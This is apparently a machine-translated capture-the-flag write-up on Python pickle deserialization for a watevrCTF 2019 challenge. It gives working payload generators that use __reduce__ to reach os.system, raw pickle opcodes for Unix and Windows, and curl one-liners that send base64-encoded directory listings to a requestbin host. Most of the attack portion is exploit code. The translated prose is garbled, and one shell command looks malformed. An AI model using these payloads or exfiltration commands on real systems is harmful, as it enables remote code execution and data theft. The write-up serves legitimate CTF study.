table of Contents
Recurring topic links: https://buuoj.cn/challenges
Reference Links: watevrCTF 2019 - the Write-UPS
python deserialization
Python pickle deserialization case study
of this article talking about the very wide
Basically this exp on it, this is the python2
import cPickle
import sys
import base64
COMMAND = sys.argv[1]
class PickleRce(object):
def __reduce__(self):
import os
return (os.system,(COMMAND,))
print base64.b64encode(cPickle.dumps(PickleRce()))python3 of almost
import pickle
import base64
class PickleRce(object):
def __reduce__(self):
import os
return (os.system, ('curl http://http.requestbin.buuoj.cn/17ozn5q1',))
print(base64.b64encode(pickle.dumps(PickleRce(), protocol=0)))Here I mainly want to say is that I do when this question pycharm payload is generated on the windows, but has been unsuccessful, and in the unix on it, and out on both platforms payload is not the same, in on unix like this
cposix
system
p1
(S'sleep 5'
p2
tRp3
.On windows is this
cnt
system
p0
(Vsleep 5
p1
tp2
Rp3
.The main reason is that the introduction of the first line module, NT is a python package windows platform, to interact with the system, and windows, unix POSIX is the corresponding packet, the subject is the unix drone, with the windows failed payload NATURAL .
OOB
In addition to sweep directory when there is a problem, lsthe returned data can not be directly curl, will return to the first line, I used two relatively stupid ways, the first is
curl http://http.requestbin.buuoj.cn/17ozn5q1/\?a=`ls / | base64 | sed -n "1p"`
curl http://http.requestbin.buuoj.cn/17ozn5q1/\?a=`ls / | base64 | sed -n "2p"`Do not know why or two lines after base64, can only read two lines, the second is
curl http://http.requestbin.buuoj.cn/17ozn5q1/\?a=`printf %s `ls /`The result of all the file names in an even, hard to see but can achieve the purpose, I think there should be a better way, I hope bigwigs wing